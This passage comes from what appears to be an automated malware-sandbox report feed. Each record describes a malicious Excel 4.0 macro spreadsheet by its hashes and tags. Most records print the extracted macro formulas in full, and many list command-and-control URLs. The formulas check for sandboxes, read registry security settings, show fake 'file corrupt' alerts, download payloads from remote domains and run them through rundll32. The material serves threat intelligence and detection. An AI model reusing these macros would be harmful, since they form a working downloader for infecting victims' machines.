255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"pyPisrn3Tt\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"14458c6b47afc675456dde964e99d86f0d90db143a5572694320318d33a5e21e"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"14458c6b47afc675456dde964e99d86f0d90db143a5572694320318d33a5e21e","filesize":185344,"md5":"f13bda9e0932de2b95a7588561671b29","sha1":"1f8d8535dbeb9f300ad66c8d5a06d6e9ba801634","sha256":"14458c6b47afc675456dde964e99d86f0d90db143a5572694320318d33a5e21e","sha512":"fe04c4f3a3018ad452b6f31a4816dacbb55578c70ff52324b325c59c3acf5db6b1bcb28f5caaa5b58db3917e45e46b7403dcffe97a76b95b79583dd763e728a2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"14458c6b47afc675456dde964e99d86f0d90db143a5572694320318d33a5e21e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"14478f65ceae5067ded09bf4affbf6ca507f274d37715b2f10b9f00603dbe1ed"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"14478f65ceae5067ded09bf4affbf6ca507f274d37715b2f10b9f00603dbe1ed","filesize":185344,"md5":"1814d1cb1d45e616d68a577af6c8f648","sha1":"97a7a27698a25332c03726f3ea495c4f11937977","sha256":"14478f65ceae5067ded09bf4affbf6ca507f274d37715b2f10b9f00603dbe1ed","sha512":"23c964cd5629f469ccbdaf83606bc9ee6f5a0617c5f3ab2248127bff980cb2c2bde2bcd64e556cf6f09672a6f9e1742b1d929a71a84fc7130ef479781f2c10cb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"14478f65ceae5067ded09bf4affbf6ca507f274d37715b2f10b9f00603dbe1ed.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"144b92380f074fce6434fa47d55f58ccc992240537bbc8e4a2783d0b54bc29ca"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"144b92380f074fce6434fa47d55f58ccc992240537bbc8e4a2783d0b54bc29ca","filesize":152576,"md5":"4f09797e13d5e1ac5ec05f8868ebbe76","sha1":"09548dd10ffe40489e8845d6a35a9f352401edda","sha256":"144b92380f074fce6434fa47d55f58ccc992240537bbc8e4a2783d0b54bc29ca","sha512":"41b6e3cbb2c3e85be4b133518ccc39e63316c79f8f4bbd18e622334016cda64e6d8cd0ed407ef764c6e48b355b07445fc0471b365949fe792161cb1163f1d3bf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"144b92380f074fce6434fa47d55f58ccc992240537bbc8e4a2783d0b54bc29ca.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1TkggoazUl\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"144c6248e5200a7fab3f7bb85529e57bc57c2d95dac4de1a6cd58ccaba684183"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"144c6248e5200a7fab3f7bb85529e57bc57c2d95dac4de1a6cd58ccaba684183","filesize":144384,"md5":"66de507213aa176e53300f1af52a7ecc","sha1":"de4f417307c2065ba8b506ef93c2379841394e71","sha256":"144c6248e5200a7fab3f7bb85529e57bc57c2d95dac4de1a6cd58ccaba684183","sha512":"c44ddebac678ae753d57c842dc3e6f70faaad29512dd62fe6a8c1298766d6cd45db1023fb4b38b50e66b2580c46da03e9523bed61f23a6d6444fe2add6ce469c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"144c6248e5200a7fab3f7bb85529e57bc57c2d95dac4de1a6cd58ccaba684183.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"ezZ1TeqvPT\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"145217e66d1ebecad8f32ca5bc7509bdc54de95a7d78c920265ae83509dccb37"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"145217e66d1ebecad8f32ca5bc7509bdc54de95a7d78c920265ae83509dccb37","filesize":212992,"md5":"89c57de8826cbc39dd6f0349f3e6d6a9","sha1":"855b20529402cc43bde1b4ae7cd027e8c997bfa0","sha256":"145217e66d1ebecad8f32ca5bc7509bdc54de95a7d78c920265ae83509dccb37","sha512":"d6411e8ba85594801cea3fc0a66dc5fce7e1c1fa3151a9aaadfbfaf8a35a52412a5162b7e826f918c28549ce60f22c2ed446f052d04889c1d8dec6298923040c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"145217e66d1ebecad8f32ca5bc7509bdc54de95a7d78c920265ae83509dccb37.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7ZCMO74AQP\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1458ef5565dad9029832836207745a30e1e3cfc01237d0fd563d971e54b5f4c2"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"1458ef5565dad9029832836207745a30e1e3cfc01237d0fd563d971e54b5f4c2","filesize":138240,"md5":"dc9e186704f6b70d7c1d2870a7592870","sha1":"37932768b7d264238d812692de0883a5d98a6729","sha256":"1458ef5565dad9029832836207745a30e1e3cfc01237d0fd563d971e54b5f4c2","sha512":"a7d6db9d0a69a0503954a74096bb4de6017ee33bdc96b9f9236071a1c98b0dbe56c4df6164c2f92d94e8fd3726482e1236903882ceecf512de43ab809b940a37","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1458ef5565dad9029832836207745a30e1e3cfc01237d0fd563d971e54b5f4c2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://gengrasjeepram.com/sv.exe"],"attr":{"formulas":"CALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://gengrasjeepram.com/sv.exe\",\"gift.exe\",0,0)\nEXEC(\"gift.exe\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1461af6a6c98bc5bb503dd3619fe15a8a7b011a941755f6a5e896def5d8e2d62"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"1461af6a6c98bc5bb503dd3619fe15a8a7b011a941755f6a5e896def5d8e2d62","filesize":168448,"md5":"d14d2a7d24797f173b0e1b35d6447a10","sha1":"defcab93a5a5b6f42968931ec178fd7de72fcac7","sha256":"1461af6a6c98bc5bb503dd3619fe15a8a7b011a941755f6a5e896def5d8e2d62","sha512":"74b4f198134ebe81fde26d6ffcc43df83cd4f263698b0b2a6ea042542e229f565e12d0d231ecd36ca75ee1a6ca7287c2ec0dcdf22e9ef3b70f0946e0a9dbc724","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1461af6a6c98bc5bb503dd3619fe15a8a7b011a941755f6a5e896def5d8e2d62.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IfwUlePSHL\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1465607e39d0626f8f20f27aeb1eafe2f1d1444e7df87e0dcfd629ae14563a60"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"1465607e39d0626f8f20f27aeb1eafe2f1d1444e7df87e0dcfd629ae14563a60","filesize":144896,"md5":"a19084ed478137d5fa097040bd89e5ce","sha1":"91eef049de9fcc16a9eccff9b43d45806a4cd8a7","sha256":"1465607e39d0626f8f20f27aeb1eafe2f1d1444e7df87e0dcfd629ae14563a60","sha512":"c54d1cd9a42580b377c14468e000446950abd9c4ee27f25d5a1d63ca6107c78c3962fd30874552fac8acf8eeb4cda9fd4c6604f8cda5edc45d6225ebcca54638","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1465607e39d0626f8f20f27aeb1eafe2f1d1444e7df87e0dcfd629ae14563a60.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/1451345341fff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1465831a56e77b99c6ea9a268a960960f91e28bdee585134c638c59c1b2f1447"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"1465831a56e77b99c6ea9a268a960960f91e28bdee585134c638c59c1b2f1447","filesize":209408,"md5":"1e37b97955b6f039417762a404418a9e","sha1":"eb0f3439f1d89adba8d422cafa56b04cb4c795ed","sha256":"1465831a56e77b99c6ea9a268a960960f91e28bdee585134c638c59c1b2f1447","sha512":"5e017e64c7f072c4b73eaf26288a9a83de92162d36c85a4ec1e80ee2f9908c2541334e6435af2e53a429c4eb94193a63b909baf065afd62e024e6ee28f2b8ba3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1465831a56e77b99c6ea9a268a960960f91e28bdee585134c638c59c1b2f1447.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CbNMa3C3LM\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"146abb67c3e3b05df81ac66f77b37035d78b6a337fcb8cf67c81081804b626e5"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"146abb67c3e3b05df81ac66f77b37035d78b6a337fcb8cf67c81081804b626e5","filesize":142848,"md5":"404be91ce74a6bfb7a599cc8f4101b8f","sha1":"f31871bc74742d6c72220554911f94e4f9600678","sha256":"146abb67c3e3b05df81ac66f77b37035d78b6a337fcb8cf67c81081804b626e5","sha512":"ccac90094f0489a239410ffbecd376437db0cbf830d124869abce5f865682b7f83038d20930bf83940cdde3dbeacde1dc66654852d74c65ce5f4b44d97f52082","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"146abb67c3e3b05df81ac66f77b37035d78b6a337fcb8cf67c81081804b626e5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"yDsd9tb6mg\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"14853308754b1ec62c789e0f447cbfcfa9f659c48e71fe7a44d03cbd4614b20d"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"14853308754b1ec62c789e0f447cbfcfa9f659c48e71fe7a44d03cbd4614b20d","filesize":104448,"md5":"6243980439413dcf80be8ea67db2bad9","sha1":"68b03807e09b91efda8945eae9515f9ab45c8f44","sha256":"14853308754b1ec62c789e0f447cbfcfa9f659c48e71fe7a44d03cbd4614b20d","sha512":"fe5431c7dfdc47f5b008586c1ebd8e2ccb590b97e44f4cf0a01e45f27f6b8a7a7e6e16a0d2ec553986fe4d0bf98b8a3ef03be935129c128850098c49ca48a2ce","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"14853308754b1ec62c789e0f447cbfcfa9f659c48e71fe7a44d03cbd4614b20d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"4x4MbeyEeY\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"149f1382a8bbe9f3acadfead3e63ccaad7b75ff72940e2cdbdabeed14e808175"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"149f1382a8bbe9f3acadfead3e63ccaad7b75ff72940e2cdbdabeed14e808175","filesize":38912,"md5":"7dfe42175b4aa08455f49cf8e8a2b314","sha1":"32707d78eaa00af4299e23851de4e46858697485","sha256":"149f1382a8bbe9f3acadfead3e63ccaad7b75ff72940e2cdbdabeed14e808175","sha512":"09dda90a87fd97aaead82ba4fbbada70bba711fac3143afcd623f7e202fb06bb7fe11f3c19feed46225bd3d84048c2d1cf34ada8b0a1a2ec5140294c180c49b6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"149f1382a8bbe9f3acadfead3e63ccaad7b75ff72940e2cdbdabeed14e808175.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"SUM(R$7C$3,R$7C$5,R$7C$7)\nSUM(R$10C$3,R$10C$5,R$10C$7)\nSUM(R$13C$3,R$13C$5,R$13C$7)\nSUM(R$15C$3,R$15C$5,R$15C$7)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"14b328d54e1dd562b40eaf00be4ed6513deaa4feef721378dedfd6f9fee5dcf0"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"14b328d54e1dd562b40eaf00be4ed6513deaa4feef721378dedfd6f9fee5dcf0","filesize":226304,"md5":"e990a66a75f39e013451b26aea350762","sha1":"482d7970e6fcf8b1a06a8fb9f82b5a975f13efee","sha256":"14b328d54e1dd562b40eaf00be4ed6513deaa4feef721378dedfd6f9fee5dcf0","sha512":"ca68a8930170bb4f074cddab1085f4a2e2aea30b2e40d309d67390910da3df8739c4643adb8e7e398965d1e83434278d23c1080e3453dc33162757cb73e71bf1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"14b328d54e1dd562b40eaf00be4ed6513deaa4feef721378dedfd6f9fee5dcf0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cI7u72XrLG\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"14bdaa53871d0ac2a700dc47e7f62032f532935775519124d1fc9955c128c982"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"14bdaa53871d0ac2a700dc47e7f62032f532935775519124d1fc9955c128c982","filesize":167424,"md5":"d64c6cd721ede38ffa30436704cb1524","sha1":"f74c2a5278f8341ede414017c1e0450812e51c79","sha256":"14bdaa53871d0ac2a700dc47e7f62032f532935775519124d1fc9955c128c982","sha512":"6085c846326d2eef0e88cd41512d769b5c19e9a7000e52b24383d1fbbed3b4cde27b2e3df0a6720c8eef9c5861e65240517ac454e4e34e2d43cb4d969d34148a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"14bdaa53871d0ac2a700dc47e7f62032f532935775519124d1fc9955c128c982.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"kOqgfIYL6E\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"14c101330e7c9d3b8b65ad26cce00932c4eb4bb1ae4f14db3635673115f33b6b"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"14c101330e7c9d3b8b65ad26cce00932c4eb4bb1ae4f14db3635673115f33b6b","filesize":112128,"md5":"e0b84472f9c699460c49bcc10c347eb7","sha1":"c8051e52a566d48f187f88be61da275a9f55774c","sha256":"14c101330e7c9d3b8b65ad26cce00932c4eb4bb1ae4f14db3635673115f33b6b","sha512":"92d8be336b85805540b59c24ad3694ccaaa1c24976ea138270d719d6a5d8631bc904424226325da2ec7abc3a92ae794eeb329dff8c239af4271e90656796765e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"14c101330e7c9d3b8b65ad26cce00932c4eb4bb1ae4f14db3635673115f33b6b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"14c7a136ed0d588c9139ac145163cd08082dac0ad2ee82d2a180ee998cc0b2e1"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"14c7a136ed0d588c9139ac145163cd08082dac0ad2ee82d2a180ee998cc0b2e1","filesize":167936,"md5":"7ddf3ff82721776e518939ff63ca5a35","sha1":"cb6b34c6799fb409fa57376e1e15f75c720dfa74","sha256":"14c7a136ed0d588c9139ac145163cd08082dac0ad2ee82d2a180ee998cc0b2e1","sha512":"8a746f5a001d7ad353b59f465cc585454e33922ab247ed782b773717550c0254f895956b8117bb8e7ff5255f40f6c2161fc5b2f0aaca526cf32232ae685c1c49","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"14c7a136ed0d588c9139ac145163cd08082dac0ad2ee82d2a180ee998cc0b2e1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Cxd8SIaGr0\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"14efa47485456684a7ebc670dd33b4e0a11b489acec7ced5b493d53211b0adec"},"analysis":{"reported":"2020-04-09T16:15:01Z","score":10},"files":[{"filename":"14efa47485456684a7ebc670dd33b4e0a11b489acec7ced5b493d53211b0adec","filesize":209920,"md5":"5fe4d92ad5973eeac38cc35a643cba44","sha1":"7ff4aa3d73b7361ef5101728a8a26e207ce422c4","sha256":"14efa47485456684a7ebc670dd33b4e0a11b489acec7ced5b493d53211b0adec","sha512":"d2af6adef01b2d4d1c5fff276d7a49b42aed12e633b5491310d650cc644ac92036c5565efde0e07a28f984b512048c713d90b5bad071cf057cba5e7baebf3025","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"14efa47485456684a7ebc670dd33b4e0a11b489acec7ced5b493d53211b0adec.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM 